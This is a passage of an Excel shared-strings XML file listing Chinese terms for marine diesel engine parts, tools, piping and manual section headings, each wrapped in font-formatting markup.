    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钻孔方案</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钻孔坐标系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最大限位螺钉布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最大压力示功器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最大压力指示器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最大压缩压力的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ISO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>修正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最后装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>左手压缩弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>左舷叶片座机加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>左旋弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>左旋螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>左旋螺旋桨叶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>左旋叶片法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>座，排气总管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>座，特制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>阀</t>
  </si>
  <si>
    <t>防爆片装配</t>
  </si>
  <si>
    <t>盖</t>
  </si>
  <si>
    <t>管支架</t>
  </si>
  <si>
    <t>滑油管</t>
  </si>
  <si>
    <t>机座泄放管</t>
  </si>
  <si>
    <t>节流孔板</t>
  </si>
  <si>
    <t>喷油器泄放管支管</t>
  </si>
  <si>
    <t>起动空气管</t>
  </si>
  <si>
    <t>燃油减震器</t>
  </si>
  <si>
    <t>燃油切断阀</t>
  </si>
  <si>
    <t>套管</t>
  </si>
  <si>
    <t>铜垫片</t>
  </si>
  <si>
    <t>弯头</t>
  </si>
  <si>
    <t>针阀</t>
  </si>
  <si>
    <t>止回阀壳体</t>
  </si>
  <si>
    <r>
      <t>FTPA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安培表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护模块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>槽环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向带</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电伴热备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电流转换器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电器元件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀驱动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具柜</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨燃油泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨转运工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元泄放油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路系统图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过载继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞压力测试工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞压力试验工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞用螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>胶带</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线端子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制元件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>棱镜</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀泄放油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油电伴热</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油泵备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油泵工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函装配工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通风装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具柜</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护灯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护周期</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>小时计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄压装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋转活接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>延长杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液体胶</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表插座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指示灯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机部件清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机运输工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动透气装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>名称</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>(NiCrNi)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器调试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（电缆）芯线</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> Y56</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（燃油）杂项</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（主机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴带交流发电机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>0-110</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伏开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>0-15</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0205-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>警告</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0220-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>介绍</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0240-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>索引表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0505-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>警告</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0535-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0540-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0545-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全注意</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0715-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>介绍</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0740-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>概要</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0745-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主要数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0745-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>总则</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0745-0150 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件执照</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0745-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>名称设计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0745-0800 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>剖面图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">0760-0301 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护计划</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">10K </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接管路法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">10K-50 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>号缸驱动端中间体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>400</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹球阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装及拆卸装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>按销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁圈</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵空气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵空气支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口连接管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>穿孔带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>瓷环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带孔六角头螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单头开口扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧拉紧器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧箱组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导轨安装及拆卸装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊装工具机加图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>断流开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多用扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰旋塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆膜支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防尘罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
